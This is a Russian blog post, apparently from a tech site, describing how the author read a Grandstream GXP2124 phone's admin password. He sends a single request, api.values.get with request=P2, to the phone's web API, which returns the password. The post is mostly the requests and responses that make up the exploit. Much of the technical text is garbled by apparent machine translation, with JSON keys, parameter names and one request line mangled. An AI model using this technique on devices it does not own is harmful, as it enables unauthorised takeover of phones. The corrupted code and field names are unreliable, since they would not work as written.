Сегодня столкнулся с проблемой: кто-то поменял пароль администратора на телефоне.
Почитав информацию в Интернете, я пришел к выводу, что:
- Смените пароль администратора, вам нужен пароль администратора;
- Сбросьте телефон к заводским настройкам, нужен пароль администратора;
- Перепрошить телефон - снова нужен недостающий пароль.
Дальнейший ход действий был следующий:
Запускаем браузер и включаем утилиту Firebug, после чего начинаем «гулять» по различным страницам.
В списке запросов было обнаружено следующее:
POST cgi-bin/api.values.getи тело ответа гласит:
{"response":"success", "body":{"vendor_fullname":"Grandstream Networks, Inc."}}Пролистав дальше, я нашел такой запрос:
POST cgi-bin/api-phone_operationв запросе были переданы следующие параметры:
cmd=extend&arg=&sid=639534b3e5aЧто дальше? А потом захожу в настройки безопасности и меняю пароль на телефоне, к которому у меня уже есть доступ, и смотрю список ответов:
POST cgi-bin/api.values.post Источник: P2=MyNewPass&:confirmAdminPwd=MyNewPass&sid=639534b3e5aГде:
- П2 — передаваемый пароль администратора;
- Подтвердите AdminPwd — подтверждение пароля администратора;
- Сид - текущая сессия (нам не пригодится).
192.168.1.253/cgi-bin/api.values.getЭrequest=P2Где 192.168.1.253 — IP-адрес телефона.
Отправляем и.
.
и мы получаем ответ в формате JSON, например:
{"ответ":"успех", "тело":{"P2": "adminPass"}}Где adminPass — текущий пароль администратора.
Выгода! С уважением, Андрей Хеллдар! P.S.: Описанный выше трюк работает на версиях прошивок до 1.0.5.58. Конкретно тестировалось на версии прошивки 1.0.5.23. Теги: #ip-телефония #grandstream #GXP2124 #сброс пароля #пароль администратора #Разработка систем связи
Вместе с данным постом часто просматривают:
-
Накачиваем Беговую Дорожку
19 Oct, 24 -
Кто Убил Пролог?
19 Oct, 24
